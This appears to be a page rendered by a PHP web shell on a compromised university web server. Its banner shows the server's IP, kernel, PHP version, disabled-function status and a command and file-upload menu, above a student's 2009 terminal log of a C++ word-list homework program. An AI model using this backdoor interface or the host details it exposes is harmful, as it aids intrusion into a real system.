Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 3.145.61.199
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/pswoodson/cs212/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/pswoodson/cs212/hw7.txt
Script started on Mon 30 Mar 2009 01:17:15 PM EST
[pswoodson@zeus cs212]$ pico hw7.cppg++ hw7.cpp -o 2d.outpico hw7.cpp./2d.out 

I	Insert an word.
F	Find  an word.
P	Print the list.
S	Sort the list.
Q	Quit.
Your choice: i
Input a word: you
the list is: you 

Type any key to continue..
I	Insert an word.
F	Find  an word.
P	Print the list.
S	Sort the list.
Q	Quit.
Your choice: i
Input a word: hey
the list is: you hey 

Type any key to continue..
I	Insert an word.
F	Find  an word.
P	Print the list.
S	Sort the list.
Q	Quit.
Your choice: s
the list is: hey you 

Type any key to continue..
I	Insert an word.
F	Find  an word.
P	Print the list.
S	Sort the list.
Q	Quit.
Your choice: p
the list is: hey you 

Type any key to continue..
I	Insert an word.
F	Find  an word.
P	Print the list.
S	Sort the list.
Q	Quit.
Your choice: f

Input an item to be found: hey
heyisn't in the list.
Type any key to continue..
I	Insert an word.
F	Find  an word.
P	Print the list.
S	Sort the list.
Q	Quit.
Your choice: q
[pswoodson@zeus cs212]$ exit

Script done on Mon 30 Mar 2009 01:18:41 PM EST

Stv3n404 - 2023